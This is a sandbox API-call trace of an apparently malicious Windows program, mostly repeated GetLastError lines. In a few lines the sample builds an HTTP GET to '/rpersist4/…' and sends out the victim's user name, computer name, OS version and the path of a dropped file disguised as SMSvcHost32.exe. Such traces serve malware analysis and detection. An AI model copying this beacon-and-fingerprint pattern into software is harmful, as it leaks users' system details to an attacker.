	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.946] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.947] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.948] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] lstrlenA (lpString="/rpersist4/1197631235") returned 21
	[0122.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205fe8c, cbMultiByte=-1, lpWideCharStr=0x73bfe8, cchWideChar=22 | out: lpWideCharStr="/rpersist4/1197631235") returned 22
	[0122.949] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/1197631235", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.949] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] GetLastError () returned 0x0
	[0122.950] wsprintfW (in: param_1=0x396d0f0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0122.950] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0122.950] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0122.951] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x68c0d8, nSize=0x205f2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x205f2bc) returned 0x1
	[0122.951] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0122.951] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0122.952] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0122.952] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c4 | out: phkResult=0x205f2c4*=0x698) returned 0x0
	[0122.952] RegQueryValueExW (in: hKey=0x698, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0122.952] RegQueryValueExW (in: hKey=0x698, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0122.952] RegQueryValueExW (in: hKey=0x698, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0122.952] RegCloseKey (hKey=0x698) returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.952] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.953] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.954] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.955] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.956] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetLastError () returned 0x0
	[0122.957] GetComputerNameW (in: lpBuffer=0x68a920, nSize=0x205f400 | out: lpBuffer="X2VS1CUM", nSize=0x205f400) returned 1
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.957] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.958] GetLastError () returned 0xcb
	[0122.959] GetLastError () returned 0xcb
	[0122.959] GetLastError () returned 0xcb
	[0122.959] GetLastError () returned 0xcb
	[0122.959] GetLastError () returned 0xcb
	[0122.959] GetLastError () returned 0xcb
	[0122.959] GetLastError () returned 0xcb
	[0122.959] wsprintfW (in: param_1=0x396d0f0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0122.959] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0122.959] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0122.959] GetVersionExW (in: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.959] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.960] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.961] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] wsprintfW (in: param_1=0x396d0f0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0122.962] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0122.962] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
